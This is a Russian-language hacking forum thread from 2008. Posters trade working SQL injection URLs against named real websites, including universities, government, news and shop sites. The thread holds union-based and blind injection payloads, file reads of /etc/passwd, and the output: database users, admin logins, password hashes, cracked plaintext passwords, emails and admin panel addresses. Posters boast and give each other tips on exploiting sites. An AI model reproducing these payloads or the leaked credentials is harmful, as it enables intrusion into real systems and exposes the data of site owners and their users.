http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+version()--
5.0.67-log
lv_users:
http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+table_name+from+information_schem a.tables+limit+37,1--
user_login:user_pass:
http://www.mojo-jojo.lv/item.php?cid=34&item=-264+union+select+concat_ws(user_login,0x3a,user_pa ss)+from+lv_users--
admin:817c2f281b767ae9ac524c596a0ee645
Thrasher88
13.12.2008, 11:42
svpressa.ru - интернет издание
http://svpressa.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20--
5.0.51a-log:svpressa@localhost:svpressa
Логин и Пасс админа: em:vue
Вход в админку: svpressa.ru/adm/
masternet
13.12.2008, 13:49
svpressa.ru - интернет издание
5.0.51a-log:svpressa@localhost:svpressa
Логин и Пасс админа: em:vue
Вход в админку: svpressa.ru/adm/
1.эту скуль я уже вылаживал..
2.правда без админки..выложи это лучше в доступах..а не тут..(смотри пунк 1)
--------------------------
http://www.hiddenmickeysguide.com/catalog.php?id=-1+union+select+concat_ws(char(32,45,32),id,name,em ail,bio,img,username,password),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+ users--
--------------------
http://www.yusk.ru/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7--
5.0.30-Debian_1-log - z71348_main@77.221.130.5 - z71348_main
ТИЦ : 80 PR: 3
-----------------------
http://www.mkc-kc.ru/shop/cat.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database())--
4.1.22-log - mksks@localhost - wwwmksksru
ТИЦ : 80 PR: 4
-------------------------
http://www.monolithstroi.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3--
5.0.67-percona-b5-log - rkot@localhost - rkot
----------------------
http://www.nzn-msk.ru/cat.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6,7,8,9,10--
4.0.24 - akrs1@localhost - db_akrs
ТИЦ : 40 PR: 2
----------------
http://www.antey87.ru/cat.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11--
4.1.20-lk-log - orionaru_aveo@localhost - orionaru_aveo
ТИЦ : 10 PR: 4
-------------------------
http://www.x-telpro.ru/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.0.27 - root@localhost - xtelpro_xtelprodb
ТИЦ : 60 PR: 4
-------------------
http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.51a-log - ukrfoto_user@192.168.2.3 - ukrfoto_db
ТИЦ : 30 PR: 3
http://www.maginfo.com.ua/cat.php?id=-1+union+select+unhex(hex(group_concat(column_name) ))+from+information_schema.columns+where+table_nam e=0x61646d696e6973747261746f7273--
id,user_name,user_password
http://www.maginfo.com.ua/cat.php?id=-1+union+select+concat(id,0x3a,user_name,0x3a,user_ password)+from+administrators--
а здесь чо то не выводит(
наверное потому что нету этих значений..т.к. там при заходе в админку не чз сайт а чз хостинг(
---------------------
http://www.arka-hitech.com.ua/cat.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
4.1.22 - arka-hitech@localhost - arka_hitech
ТИЦ : 20 PR: 3
-----------------
http://foto.pokupaem.com.ua/cat.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
5.0.51a-log - ukrfoto_user@192.168.2.3 - ukrfoto_db
PR: 1
--------------
http://www.riak.lg.ua/pagegen.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4--
5.1.15-beta-log - linksuser@localhost - links
ТИЦ : 70 PR: 4
----------------
http://www.dominican.edu/query/ncur/display_ncur.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(char(32,45, 32),version(),user(),database()),9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81 ,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,9 8,99,100,101,102,103,104,105,106,107,108,109,110,1 11,112,113,114,115,116,117,118--
5.0.26-LOG - DUOC_ONLINE@NACIO1 - DOMINICAN
ТИЦ : 70 PR: 6
----------------------
http://webscript.princeton.edu/~paw/memorials/memdisplay.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6,7,8,9--
4.1.12-log - paw@localhost - paw
ТИЦ : 60
----------------------
http://www.inst.msstate.edu/print_page.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9--
4.1.22-log - inst_site@localhost - inst_frontend
PR: 5
-------------------
http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6,7,8,9,10,11--
4.1.22-standard-log - opednews_vidya@localhost - opednews_pearl
ТИЦ : 220 PR: 6
------------------
http://www.faoswalim.org/resource_center/geonetwork/link.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16--
4.1.22-standard - faoswa_new@localhost - faoswa_new
PR: 5
-------------
http://www.villaclick.com/search/availabilitymail.asp?ID=-1+union+select+top+1+username%2bchar(0x7e)%2bpassw ord,222,333+from+Operators--
http://www.villaclick.com/admin/
masternet
13.12.2008, 16:24
дел..
Thrasher88
13.12.2008, 17:33
www.peoples.ru - крупное интернет издание
http://www.peoples.ru/forum/input.php?i=-1'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,v ersion(),user(),database()),11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38--%20%201
Version: 5.0.45-log
USER: alexrus@89.108.84.125
Database: peoplesru
masternet
13.12.2008, 17:49
https://secure1.ilisys.com.au/great/order.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6--
4.1.21-standard-log - great@117.104.160.65 - great_db
------------------
http://www.navimeteo.eu/order.php?ID=-1+union+select+1,concat_ws(char(32,45,32),Username ,Password,testoMail,refMail,mail2,contratto,contra tto_eng,contratto_ita,allegato_eng,allegato_ita,br ochure_ita,brochure_eng,last_access,last_ip),3,4,5 ,6+from+nav_settings--
http://www.navimeteo.eu/admin nav0609:rfz278hj
-------------------------
http://www.artworksisrael.com/order.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14, 15--
5.0.32-Debian_7etch8-log - aistore@localhost - aistore
----------------
http://zhdkrecords.zhdk.ch/order.php?ID=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6--
5.0.32-Debian_7etch6-log - hmtzrecords@localhost - hmtzrecords
-------------------
http://dtv.horizont.by/index.php?id=news&n=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5--
4.1.22-standard - dtvhori_user@localhost - dtvhori_dtvdb
-----------------------
http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24--
4.1.22-log - viz_php@localhost - sioviz
PR: 6
---------------
http://www.lrdc.pitt.edu/people/person-detail.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2,3,4--
4.1.22-log - lrdc@ewi-dept-02.cssd.pitt.edu - lrdc-site
ТИЦ : 10 PR: 6
-----------------------
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32 ,45,32),user_id,user_name,user_login,user_password ,user_level))),6,7+from+users+limit+0,1--
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,unhex(hex(concat_ws(char(32 ,45,32),user_id,user_name,user_login,user_password ,user_level))),6,7+from+users+limit+1,1--
http://www.magindustries.com/admin
http://www.magindustries.com/cpanel
к админкам не конектит(
http://www.magindustries.com/detail.php?id=-1+union+select+1,2,3,4,concat_ws(char(32,45,32),ve rsion(),user(),database()),6,7--
5.0.67-community - magind_dbguy@localhost - magind_main
--------------------
http://www.nwce.gov.uk/view_event.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
4.1.22-standard-log - nwce@localhost - nwce
--------------------
http://www.bbaa.org.uk/index.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database())--
5.0.67-log - bbaa@localhost - bbaa
PR - 6
------------------------
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13--
4.0.27-standard-log - dbo120565932@212.227.119.149 - db120565932
ТИЦ - 30
------------------
http://www.norwichplayhouse.org.uk/viewshowdetail.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15--
4.0.23-standard - norwichp@localhost - norwichp_play
PR - 5
-----------------
http://www.worksmart.org.uk/jargonbuster/index.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.20 - worksmart@localhost - tuc
ТИЦ : 70 PR: 6
----------------
http://www.monitor-nhsft.gov.uk/publications.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( %20),user(),database()),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19--
5.0.54 - monitor@localhost - nhsftreg
ТИЦ : 10 PR: 5
----------------
http://old.cs.ncl.ac.uk/people/home.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27--
5.0.45 - csReader@localhost - CompSci
PR: 4
---------------------------
http://www.gower-boat-trips.co.uk/home.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12--
4.1.22-STANDARD - GOWER_ADVENTURER@LOCALHOST - GOWER_COAST
--------------------
http://www.ansti.org/order.php?id=-1+union+select+1,2--
4.1.22-standard
ansti@localhost
ansti_anstiorg
masternet
14.12.2008, 02:48
http://www.genetics.wisc.edu/faculty/profile.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.26-log — anon_read@zotz.genetics.wisc.edu — registry
ТИЦ : 40 PR: 7
-----------------
http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
4.0.20-debug-debug - smit
ТИЦ : 50 PR: 5
-------------------
http://goodbux.buxhost.ru/login.php?'
Есть ли тут инъекция, если да то как можно её раскрутить
:::::::::: есть таблицы ::::::::::::
* tb_ads
* tb_ads_categories
* tb_advertisers
* tb_buyref
* tb_cheaters
* tb_checkfaq
* tb_clickpack
* tb_config
* tb_contact
* tb_history
* tb_messenger
* tb_payme
* tb_refset
* tb_site
* tb_upgrade
* tb_users
* users_online
DE Shop'ы
www.salesafter.de
http://www.salesafter.de/index.php?id=-62+union+select+1,2,concat_ws(0x3A3a,version(),dat abase()),4,5,6,7,8,9,10,11,12,13/*
4.0.27-max-log::db103929080
______________________________
www.schuetzenbund.de
http://www.schuetzenbund.de/shop/list.php?id=-21'+union+select+1,concat_ws(0x3A3a,name,password) ,3,4,5,6,7,8,9+from+user/*
admin::sh00ting
5.0.32-Debian_7etch8-log
Cennarios
14.12.2008, 19:01
http://www.chiapas.gob.mx/funcionarios/listado-servidores-entidad.php?id=-1+union+select+concat_ws(0x3a3a,usuario,password,d atabase()),2,3,4,5,6,7,8,9,10,11,12+from+usuarios+ limit+0,1/*
login: jlmorales
pass: mo222530
http://www.chiapas.gob.mx/admin/
ПОХЕК )))
masternet
14.12.2008, 19:17
http://www.aupe.org/in_the_news/news.php?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21+from+admin--
KJa6hDJQyb
логина не нашёл
4.0.18
народ, помогите плиз)
http://www.bastion-vlg.ru/ask/?id=1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25%20/*
до 35 даже перебирал) никак неподбирается,.. чё делать?
Jokester
14.12.2008, 19:28
http://www.bastion-vlg.ru/ask/?id=1+union+select+1,2,3,4,5,6,7,8,version()+--+
PS В следующий раз вопросы в соседней ветке, пожалуйста
непонял) юмора...
а зачем ' убрал?
2F4R
http://www.bastion-vlg.ru/ask/?id=1+union+select+1,2,3,4,5,6,7,8,version()--
masternet
14.12.2008, 19:35
непонял) юмора...
а зачем ' убрал?
мда..ты статейки почитай..
https://www.myparklane.com/repcart/repcart.php?rep_id=-1+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
Читаемс файлы
Cennarios
14.12.2008, 19:47
http://www.localpet.com.mx/en/detalle_lost.php?indice=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,usuarios _user,usuarios_pass),7,8,9,10+from+usuarios+limit+ 0,1/*
Злобный похек ))
Ну что? Поувedим?
http://monasticmatrix.usc.edu/cartularium/article.php?textId=0+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a 3a3a,user,0x3b,password),16,17,load_file(0x2f65746 32f706173737764),19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql. user--
4.1.22-standard:root@localhost:::root;2c0172cd64f6a4e5
DJ.KilleR
14.12.2008, 20:35
http://www.villanoailles-hyeres.com/hyeres22en.php?cat_id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15/*
willy@imu133.infomaniak.ch:5.0.45-log:villanoailles-hyerescom
http://www.space97.ru/catalogue.php?group=1%27
подскажите что за фигня?
masternet
14.12.2008, 22:27
подскажите что за фигня?
фигня как фигня..не скуль..
https://www.bcbookshop.co.uk/nla/book.php?id=-1+union+select+1,2,3,4,5,load_file(%27/etc/passwd%27),7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33--
шелл не залить..т.к. стоит на виртуал хосте..((
Ну как я могу не поддержать тему. Ловите.
school.su
http://www.school.su/text.phtml?m=-999+union+select+concat_ws(0x3a,version(),user(),d atabase())/*
ппц на школы потянуло...
____________________________
drc.academic-staff.wisc.edu
http://drc.academic-staff.wisc.edu/faq/faq_answers.php?question_id=0+union+select+concat( user,0x3a,password),2,3+from+mysql.user/*
____________________________
gps-profi.ru pr-5 Тиц-190 ух что я нашел
хочу админить форумом
http://www.gps-profi.ru/garmin_carry.php?id=-28+union+select+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58+from+phpbb_users+limit+1,1--
admin:0295af933b3aaed46b76727b6d79f4b2-93457456
http://gps-profi.ru/forum/admin
хочу админить сайтом
http://www.gps-profi.ru/garmin_carry.php?id=-28+union+select+1,concat(password,0x3a,login),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57,58+from+admin--
admin:93457456
http://www.gps-profi.ru/admin/
авторизация, вроде как не из бд... Но пароль подходит(админ ставит одни и теже пароли)
u36635@10.10.10.223:5.0.67-log
_____________________
nigatrade.biz
http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8 ,9,10,11,12+FROM+admins+limit+1,1--
root:74b32d175f2101ba6e831478f32b85d8-johnniko
http://nigatrade.biz/admin/
_____________________
seo.kharkov.ua
http://seo.kharkov.ua/artikle.php?id=-1+union+select+1,2,concat(nick,0x3a,passwd),4,5,6, 7+FROM+users--
admin:837a1b504eff2161d14187f1fd52d3b7
_____________________
kiirus.ee pr-3
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,concat(name_admin,0x3a,pass_admin ),3,4,5,6+from+admin--
Need4speed08:d2357411549940e64b552c99e78a1035-393_AZE
http://www.kiirus.ee/php/admin/
Как-то так = ) давайте ...держим тему
dr.Pilulkin
14.12.2008, 23:52
h__p://www.pdaplaza.com/shop.php?catid=18&id=-737+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42--
pdaplaza_pda@localhost
4.1.22-standard
Table [admins]
admin_email
admin_id
admin_pwd
admin_name
admin_uid
Возможно есть другие колонки
Phillip:5e6cbfce52f55b0b3065b6806a7d5d41:info@pdap laza.com
supervisor:d943b780e979b19baa64c243d26669b1:info@p daplaza.com
Kovacs Robert:19640501:kovacs@pdaplaza.com
5e6cbfce52f55b0b3065b6806a7d5d41:partisan08
админка хз где
masternet
15.12.2008, 00:15
http://www.pinnacleproactive.co.uk/resources/events/book.php?Id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12+from+admin--
http://www.pinnacleproactive.co.uk/edit/
PR: 3
----------------
http://www.ciritas.ru/product.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9--
4.1.22-log - ciritas5_website@localhost - ciritas5_ciritas
------------------------
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(login,0x3a,password,0x3a,total_score))),11,1 2+from+user--
-----------------
Поздравьте меня - моя первая самостоятельная скуля))
Французики.
http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,database(),user(),v ersion())/*
histel histel@localhost 5.0.32-Debian_7etch6-log
http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,login,pass)+from+hi stel.users+limit+0,1/*
admin:2008histel логин и пасс от админки
http://www.isep.fr/histelcon/admin/
они же подходят и к phpmyadmin - http://www.isep.fr/phpmyadmin
Увы, на этом всё обрывается, файловых привилегий нет, а админка весьма скудная в средствах. Есть только простенькая форма аплоада http://www.isep.fr/histelcon//admin/envoyer_fichier.php, но как я не бился, заставить принимать файлы с расширениями, отличными от pdf, doc и ppt , не удалось.. нулевой байт не проходит и прочие фишки...
Причем при аплоаде проверка идет только по расширению, не по типу файлов...
http://english.dvb.no/textonly/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--http://www.art-nouveau.hu/art.php?menuid=2&id=-1+union+select+1,2,3--
http://www.osagyefotheatre.org.uk/story.php?id=-1+union+select+1,2,3--http://www.ssfb.ro/news.php?id=-1+union+select+1,2,3,4,5,6,7--http://bevalex.by/news.php?id=-1+union+select+1,2,3,4,5--http://www.mvp.gomel.by/news.php?id=-1+union+select+1,2,3,4,5,6,7--http://techinvest.com.ua/print.php?type=page&lang=en&id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users--http://pervomaisk.mk.ua/print.php?file=rishenia&r=act&id=-1+union+select+1,2--http://www.usdp.kiev.ua/print.php?mid=157&action=print&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--http://www.sadochek.com.ua/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--http://democracy.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- (PR 5, ТИЦ 550)http://www.vaal.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--http://www.2kaudit.ru/print.php?t=news&id=-1+union+select+1,2,3,4,5,6,7,8-- (PR 6)http://www.autospektr.ru/print.php?mode=full&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24--http://www.planopestcontrol.com/page.php?id=-1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,1 3,14,15+from+admin--http://www.ief.hr/page.php?id=-1+union+select+1,2,3,4--
Есть сайты с нормальным PR, а некоторые просто "г**но-сайты"...
satana8920
15.12.2008, 16:07
Вот от меня
PR 4
сайт: www.sbbs.ru
уязвисомть: http://www.sbbs.ru/news/index.php?id=999999999999999999+union+select+1,2,3 ,4,5,version(),7,8,9,10,11,12,13/*
user(ivolgaru_news@localhost)
version(4.1.22-lk-log)
database(ivolgaru_news)
PR 4
сайт: http://globus.mp21.ru
уязвисомть: http://globus.mp21.ru/topics.php?ID=99999999999999+union+select+1,versio n(),3,4,5,6,7,8,9/*
user(mp21ru_globus@localhost)
version(4.1.22-standard)
database(mp21ru_globus)
RP 0
сайт: http://www.interp.ru/
уязвисомть: http://www.interp.ru/index.php?id=-3+union+select+1,2,3,4,5,6,7,version(),9,10/*
user(interp@localhost)
version(4.1.22-log)
database(wwwinterpru)
RP 4
сайт: http://ecom-info.spb.ru/
уязвисомть: http://ecom-info.spb.ru/monitoring/print.php?id=-208+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,ver sion(),15,16,17,18,19,20,21,22,23,24,25,26--
user(u9116@10.10.223.234)
version(5.0.24a)
database(u9116_2)
RP 5
сайт: http://www.omskdrama.ru
уязвисомть: http://www.omskdrama.ru/wwwroot/index.php?gid=-104+union+select+1,2,version(),4,5,6,7/*
user(drama@localhost)
version(4.1.22)
database(drama)
PS Вся жизнь театр ,а люди в нем актеры )
RP 4
сайт: http://www.allaces.ru/
уязвисомть: http://www.allaces.ru/p/episode.php?id=-444+union+select+1,2,3,4,version()--
user(ecom@localhost)
version(5.0.67-log)
database(ecom)
RP 4
сайт: http://www.genoterra.ru/
уязвисомть: http://www.genoterra.ru/news/comment.php?id=-938+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2/*
user(genoterra@localhost)
version(4.1.21-standard-log)
database(genoterra)
spherics
15.12.2008, 19:36
Фанатам Диабло старкрафта варкрафта.....
http://strategy.diabloii.net/searchcat.php?cid=36+union+select+1,version(),3,us er(),database(),6,7/*
Database Version: 5.0.42-log
Database name: stratd2
User name: d2strategy@localhost
С мускула логины и пароли
root *CD3F739E436C54FDC8B2D2F844C223817ACC2118
starcraftwire *1EA1E1C7B33A1318B8FFDF44C89E34E2B43418DA
d2strategy *DC960B6A83F5D1D7738DB7B4C80DABA9F5702647
blizzpages *1FA34052F3B051E4323ADFD5EDA04CF183F3A79E
aocforums *7574F9535B810D513B4C9C2F8C33EF0B6BEDC98B
aocgallery *1A336A2F564A40CF1348ACB80627E95259B3B549
aocring *60F70737C92FA05993090552F9750EA92E5805DB
starcraftwiki *91D00EE01412A5447CAD8BD8443949557FB00E30
starcraft-2763 *23CB9564F4A8C2818F6C6EFFBD5018B170236F8D
В общем там несколько замечательных хоста....)
А теперь закончим начатое.
Довольно крупное диз агенство пароли так и не подобрал
http://www.marotori.com/news.php?id=2+union+select+1,2,3,concat_ws(0x3a3a, user_id,user_name,user_password,user_email),5,6+fr om+users--
MD5(UNIX)
root::$1$K6ORGtcZ$wQuds2xEEzYFc7BnHHgel0
admin::$1$6DUI484h$0cQV5wcSIVoXH5q5k8mTe.
Ну и попроще :
http://www.replocate.com/category.php?id=-8+union+select+concat_ws(0x3a3a,version(),user(),d atabase())/*
version: Industry: 5.0.45-log
user: rl-user@10.0.0.2
database: replocate
http://www.nsgroupllc.com/news.php?id=-11+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database())/*
version: 5.0.32-Debian_7etch8-log
user: nsg_read_only@localhost
database: nsg
http://www.lo-cal.com/eventinfo.php?event_ID=266+union+select+version(), user(),3,4,5,6,7,8,9,10,database(),12,13+limit+1,1/*
version: 4.1.22-standard
user: localftp_localmu@localhost
database: localftp_localmusic
http://mutualideas.com/projects.php?id=-47+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9--
version:5.0.32-Debian_7etch1-log
user:mysql2908@localhost
database:db2908_mutual04
http://www.parsiteb.com/combinational.php?table=combinational&id=-19+union+select+1,version(),3,4,user(),database(), 7,8,9,10,11,12,13--&action=viewFullContent
version: 5.0.45-community
user: parsiteb_parsite@localhost
database: parsiteb_parsitebdatabase
Cennarios
15.12.2008, 21:10
http://www.havanaclub.cz/boutique/?act=8&pid=-1+union+select+1,2,concat_ws(0x3a3a,login,passwd), 4,5,6,7,8,9,10+from+admin_users+limit+0,1/*
login: david
pass:david
ЛОЛ
spherics
15.12.2008, 23:47
Все срочно идём в магазин за Катанами и всякой такой китайской штукой -) или японской не силён в этом -)
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database())/*
Database Version: 5.0.45
Database name: kitanaru
User name: kitanaru@localhost
Таблица personal
id:login:psw:type:fio:email
2:ANDR:dbe679f999e91a255b5b4ecb9303f888:1:Горя чев:adm@kitana.ru password:CJRJKJDF
3:777:c7411e168031e804e9f35fbc362ef87c:2:Евге ий Васильевич:opt@berbut.ru password:: 1G0
5:OLEG:3767d0c6335a92c2364dca739c3b0c23:1:Цыбу льский Олег:oleg@kitana.ru password: XTHYJD
spherics
16.12.2008, 00:19
Ну и на сегодня последнее поразвлекаться в игрушки ......
http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws( 0x3a3a,version(),user(),database()),6,7,8--
version: 4.1.10-log
user : novelgames@localhost
database:novelgames
Далее достаём всё сами я чисто админчеГа поднял и норма *)
Пароли в открытом виде.Сделали нам одолжения *)
http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws( 0x3a3a,id,name,password,email),6,7,8+from+players+ limit+9,1--
1 :: Peter Lee :: boul3lam :: peter@novelgames.com
Всё спокойной ночи вам!
masternet
16.12.2008, 00:20
http://faceup.ie/article/index.php?ID=-1+union+select+1,2,3,4,5,concat_ws(0x3a,ID,usernam e,password,level),7,8,9,10,11,12+from+tbl_adminare a--
http://faceup.ie/admin
403 error нет доступа(
spherics
16.12.2008, 02:22
masternet От себя ихних же разрабов добавлю если можно
http://itdevotion.com/portfoliodetail.php?ID=-5+union+select+1,2,concat_ws(0x3a3a,username,passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21+from+tbl_user/*
version: 5.0.45-log::
user: ktunney_ktunney@web14.hosting365.ie
database:ktunney_rqop22i
admin::admin15613$1231fasd89h1a5g89
pogreboc.com
http://www.pogreboc.com/girl.php?id=1+and+2=999+union+select+concat_ws(0x3 a3a3a,id,name,pasw,mail),2+from+users_db--
кто внимательный, тот заметил, что вывод данных на глаз не виден. Но в сорсах есть)
masternet
16.12.2008, 12:04
http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(column_n ame))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+infor mation_schema.columns+where+table_name=0x745f61646 d696e--
поля админа
--------------
http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(table_na me))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+inform ation_schema.tables--
все таблы
----------------
http://www.epodsolar.com/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29--
4.1.20:epodsol_cm:epodsol_usr1@localhost
------------
Пока я тут, активность в данном разделе будет.
http://www.memfis.eu/ko7e7a/users.php?id=-32+union+select+1,aes_decrypt(aes_encrypt(convert( concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,webs ite),binary),0x71),0x71),3,4,5,6,7+from+users+limi t+0,1--
cpdvd.ru
http://www.cpdvd.ru/catalog.php?id=-4203+union+select+1,2,convert(concat(userid,0x3a,p ass,0x3a,nam,0x3a,fam,0x3a,tel),%20binary),4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 +from+users+limit+0,1/*
Счастье для пранкера, столько паролей от юзеров, которые ещё и телефоны мобильные оставляют.
Ловите more 1 row sql inj jir.it
http://www.jir.it/main.php?langid=2+and+if(ascii(lower(substring((se lect+concat(userid,0x3a,username,0x3a,passwd)+from +administration+limit+0,1),1,1)))%3C255,(select%20 1%20from%20administration),567)=1/*
administrator:dc8df5c2eecdb245ead108cfb7352f8b
расшифровать хеш не удалось к сожалению.
The matrix
17.12.2008, 01:30
какой-то сайт мвд украинский попался ;)
http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,ho st,user,password),2,3,4,5,6,7,8+from+mysql.user+li mit+0,1--
slava@localhost:imei
localhost:root:*2679BA488B8CF696590C7C1D5180438776 1ECA94
AkyHa_MaTaTa
17.12.2008, 02:35
какой-то сайт мвд украинский попался ;)
http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,ho st,user,password),2,3,4,5,6,7,8+from+mysql.user+li mit+0,1--
